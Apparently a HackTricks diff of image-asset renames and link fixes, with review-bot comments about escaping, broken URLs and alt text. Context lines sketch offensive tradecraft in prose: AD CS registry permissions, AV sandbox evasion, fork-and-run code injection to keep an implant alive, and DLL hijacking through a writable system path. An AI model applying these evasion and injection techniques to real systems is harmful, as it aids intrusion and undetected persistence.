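Review bot: the bird-emoji link just before the `hacktricks\_live` change still points at `https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md`, a mangled target with an escaped bracket and a single-slash `https:/`; it should be `https://emojipedia.org/bird/` like the speech-balloon link. Also confirm that GitBook does not emit the backslash literally into the href, since `hacktricks\_live` is not the same handle as `hacktricks_live`.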
@ -113,7 +113,7 @@ The **security descriptor** configured on the **Enterprise CA** defines these ri
|
||||||
|
|
||||||
This ultimately ends up setting the Security registry value in the key **`HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration<CA NAME>`** on the CA server. We have encountered several AD CS servers that grant low-privileged users remote access to this key via remote registry:
|
This ultimately ends up setting the Security registry value in the key **`HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration<CA NAME>`** on the CA server. We have encountered several AD CS servers that grant low-privileged users remote access to this key via remote registry:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (6) (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (6) (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Low-privileged users can also **enumerate this via DCOM** using the `ICertAdminD2` COM interface’s `GetCASecurity` method. However, normal Windows clients need to install the Remote Server Administration Tools (RSAT) to use it since the COM interface and any COM objects that implement it are not present on Windows by default.
|
Low-privileged users can also **enumerate this via DCOM** using the `ICertAdminD2` COM interface’s `GetCASecurity` method. However, normal Windows clients need to install the Remote Server Administration Tools (RSAT) to use it since the COM interface and any COM objects that implement it are not present on Windows by default.
|
||||||
|
|
||||||
|
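Review bot: the registry path `HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration<CA NAME>` is missing the backslash between `Configuration` and `<CA NAME>` (the key is `...\CertSvc\Configuration\<CA NAME>`); it was most likely eaten by markdown escaping, so write it as `\\<CA NAME>` or keep the whole path in a code span where the backslash survives.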
@ -226,7 +226,7 @@ certutil -v -dstemplate #enumerate certificate templates
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
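Review bot: the only visible change in this hunk is the added backslash in the link destination `https://twitter.com/hacktricks\_live`; CommonMark honours backslash escapes inside link destinations, so the rendered URL is unchanged, but the escape is GitBook sync noise rather than an intentional edit and will churn on every export. While touching this line, note that the displayed handle `@carlospolopm` does not match the destination `hacktricks_live` (pre-existing on both sides), and the bird emoji link points at a GitHub tree URL with a stray `\[` rather than at emojipedia; suggest fixing both and dropping the escape so the line reads `[**@carlospolopm**](https://twitter.com/hacktricks_live)` or whichever handle is current.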
@ -54,7 +54,7 @@ It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you c
|
||||||
|
|
||||||
Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes
|
Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (2) (1) (1) (2).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (2) (1) (1) (2) (1).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure>
|
||||||
|
|
||||||
As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something:
|
As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something:
|
||||||
|
|
||||||
|
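Review bot: the figure `src` moves from `image (2) (1) (1) (2).png` to `image (2) (1) (1) (2) (1).png` with no change to the caption, so this is an asset rename, not a content change; confirm the new file is actually committed under `.gitbook/assets/` and that the old `image (2) (1) (1) (2).png` is either removed or still referenced elsewhere, otherwise the repo accumulates orphaned binaries with every GitBook round-trip. The surrounding context lines (sandbox-evasion tips) are unaffected.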
@ -303,7 +303,7 @@ Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) alr
|
||||||
|
|
||||||
It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**.
|
It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**.
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (7) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (7) (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
* **Inline**
|
* **Inline**
|
||||||
|
|
||||||
|
|
|
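Review bot: both the old and new `<figure>` in this hunk carry `alt=""` and an empty `<figcaption></figcaption>`, so the image that illustrates the fork-and-run versus inline tradeoff described in the context line has no textual description at all; since the asset is being renamed anyway (`image (7) (1).png` to `image (7) (1) (3).png`), suggest adding a short alt text or caption here (for example, what the diagram shows about the sacrificial process) so the paragraph still makes sense when the image fails to load or is read without rendering.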
@ -57,7 +57,7 @@ if ($envPath -notlike "*$folderPath*") {
|
||||||
* **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**.
|
* **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**.
|
||||||
* Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder:
|
* Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (18) (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### Missed Dlls
|
### Missed Dlls
|
||||||
|
|
||||||
|
|
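Review bot: this rename runs in the opposite direction to the others in the change set, from the suffixed `image (18) (3).png` to the bare `image (18).png`; double-check that `image (18).png` is the procmon filter screenshot the surrounding steps refer to and not a different asset that previously held that name, since a collision here silently swaps the picture under the "Add these filters" step. Separately, the unchanged context line spells "proccess" with a double c ("some proccess tried to load"); worth fixing to "process" in a follow-up since it appears on both sides of the diff.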